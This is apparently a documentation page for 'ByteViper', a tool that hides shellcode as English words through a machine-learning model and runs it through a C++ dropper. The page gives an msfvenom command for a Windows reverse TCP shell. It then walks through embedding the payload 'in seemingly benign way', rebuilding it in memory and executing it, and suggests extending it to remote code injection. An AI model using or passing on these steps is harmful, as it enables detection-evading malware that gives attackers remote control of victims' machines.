Source code explanation
The source code is in https://github.com/ghostpepper108/ByteViper/
TLDR: After the payload is generated by AI module and the dropper is compiled with the AI generated payload, the dropper is executed. The dropper connects to the AI module, sends the English words one-by-one and the pre-trained model in AI module uses mathematical function to fetch the payload from the vectors for those English words.
This project has the following files and explained below
payload-generator.py: This is a payload generator created by Byte Viper AI engine. It converts raw hex code payload (for example msf venom) to its mathematical representations in vectors using the pre-trained machine-learning model. Here are the instructions on how to use.
Create a working payload. For instance, msf venom payload would be
msfvenom -p x64 --platform windows -p windows/x64/shell_reverse_tcp lhost= lport= -f cYou would get something like
\Remove all \x and " so that you are left with
fc4883e4f0e8c000000041514150....Use this as your input nextYou would receive the AI generated payload which you embed it in your code
A ".pkl" file would also be created that hold the vectors
Place this file, in the same path, along with your dropper binary
Also place payload.py, in the same path, along with your dropper
payload.py: This python file that goes along with your dropper binary. This file contains the code to get the english words from dropper and get the equivalent hex code from the AI module.
ByteViper.cpp: This C file is the dropper file. This is just an example of how the payload is embedded, in seemingly benign way, using English words. This code also connects to the AI module to get the raw hex code and then assemble them in memory one byte at a time, just before executing the payload. This code can be modified to use many other techniques including remote code injection.
tasks.json: This is the vscode config file that I used for compiling the code
Last updated